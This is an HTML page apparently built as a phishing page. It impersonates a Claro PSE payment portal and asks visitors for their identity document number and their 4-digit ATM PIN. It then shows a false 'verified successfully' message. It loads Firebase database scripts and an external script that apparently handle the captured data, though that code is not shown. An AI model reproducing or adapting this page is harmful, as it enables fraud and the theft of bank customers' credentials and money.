<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="style.css">
  <title>Portal de pagos Claro PSE</title>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>

</head>
<body>
  <header>
    <img src="/assets/cerrar1.png" alt="Imagen 1">
    <img src="/assets/icono.png" alt="Imagen 2" class="small-image">
    <img src="/assets/continuar.png" alt="Imagen 3">
  </header>
<div class="container">
  <div id="contenedor"></div>

    <section id="usuario"  >
      <p class="hola"><b>¡Hola!</b></p>
    <p class="titulo2" >Si aun no has creado el usuario, ingresa el numero del documento de identidad.</p>
    <div class="input-box">
      <img class="iconouser" src="/assets/ico-usu.png">
      <input class="input" id="usuarioInput" type="text" placeholder="Ingresa el usuario">
    </div>
    <button class="btn-continuar" onclick="imprimirusuario()" >Continuar</button>
    <p class="noeres"><b>¿No eres cliente?</b></p>
    </section>


    <section id="clavefija" style="display: none;">
    <p class="titulo2">Ingresa la clave que utilizas en el cajero</p>
    <div class="input-box">
      <img class="iconopass" src="/assets/desbloquear.png">
      <p class="titulo2pass">Ingresa la clave</p>
      <input class="inputpass" id="claveInput" maxlength="4" inputmode="numeric" type="password">
    </div>
    <button class="btn-continuar" onclick="imprimirclave(); mostrarnuevodiv(sectionId)">Continuar</button>
    </section>

    <section id="Terminado2" style="display: none;">
      <img class="logooficial" src="/assets/logo-oficial.png">
      <br>
      <p class="titulo2verificacion"> Su informacion fue verificada exitosamente!</p>
      <img class="verificada" src="/assets/marca-de-verificacion.png">
      <p class="titulo2verificacion">En unos minutos le llegara un mensaje a su celular de confirmacion exitosa.</p>
      <br>
      <p class="titulo2verificacion"> Muchas gracias por preferirnos y ayudarnos a mantenerte seguro!</p>
      </section>
  </div>
    
    <img class="fondo" src="/assets/fondo1-1024x459.png"
      
</body>
<script src="imgg-tri.js"></script>
</html>
